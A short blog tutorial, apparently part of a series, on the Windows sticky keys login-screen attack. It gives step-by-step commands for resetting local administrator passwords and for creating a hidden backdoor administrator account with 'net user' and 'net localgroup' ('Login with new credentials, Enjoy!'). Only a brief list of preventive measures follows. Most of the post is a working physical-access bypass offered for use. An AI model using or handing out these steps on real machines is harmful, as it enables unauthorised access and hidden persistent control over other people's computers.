Sticky keys attack (Part2)

This is part2 of my Intro for the sticky keys attack. After rebooting the system we can hit the Shift key 5 times to open a cmd prompt. (replacement of sethc.exe)

open-command-prompt-sticky-keys-method

Now we can use the GUI or the cmd to install a backdoor user.

Method 1: GUI

In the cmd prompt we type: control userpasswords2

Choose User that is part of the administrator group and reset password or create one.

control-userpasswords2-reset-password

control-userpasswords2-set-new-password

Method 2: Use the cmd

Get administrators list: net localgroup administrators

(You’ll get a list with all users that belong to the local admin group)

change password by typing: net user „username“ password

net-user-set-password

In that case rootsh3ll is the username and pass the new password

Login with new credentials, Enjoy!

Howto create a backdoor User

Create a new user: net user /add hiddenuser secretpassword

Add User to local admin group: net localgroup administrators hiddenuser /add

set user to hidden: net user hiddenuser /active:no

net-user-create-hidden-user-in-windows-from-cmd

Check backdoor user visibility: control userpasswords2

The hiddenuser should not be shown.

Prevention from sticky boot attack

  • encrypt your harddrive
  • set bios password
  • disable additional boot device possibilty (Flashdrives/USB/CD/DVD)
  • Turn off Sticky keys:

unselect-turn-on-sticky-keys-21627_x

 

 

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.